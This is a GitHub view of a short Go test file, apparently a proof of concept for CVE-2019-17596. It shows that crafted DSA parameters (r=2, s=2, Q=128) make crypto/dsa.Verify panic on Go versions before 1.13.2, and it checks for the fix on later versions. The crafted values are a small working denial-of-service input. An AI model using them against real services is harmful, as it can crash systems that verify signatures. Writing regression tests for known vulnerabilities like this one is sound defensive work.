-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathdsa_test.go
More file actions
35 lines (27 loc) · 719 Bytes
/
dsa_test.go
File metadata and controls
35 lines (27 loc) · 719 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
package poc_dsa_verify_CVE_2019_17596
import (
"github.com/stretchr/testify/require"
"crypto/dsa"
"crypto/rand"
"testing"
)
func TestDSAVerify(t *testing.T) {
priv := examplePrivateKey()
hashed := []byte("testing")
r, s, err := dsa.Sign(rand.Reader, priv, hashed)
require.NoError(t, err)
require.True(t, dsa.Verify(&priv.PublicKey, hashed, r, s))
r.SetInt64(2)
s.SetInt64(2)
priv.PublicKey.Q.SetInt64(128)
tf := func() {
require.False(t, dsa.Verify(&priv.PublicKey, hashed, r, s))
}
if isFixed(t) {
t.Log("Using Go >= 1.13.2 -- dsa.Verify should work")
require.NotPanics(t, tf)
} else {
t.Log("Using Go <= 1.13.2 -- dsa.Verify will fail (test should pass)")
require.Panics(t, tf)
}
}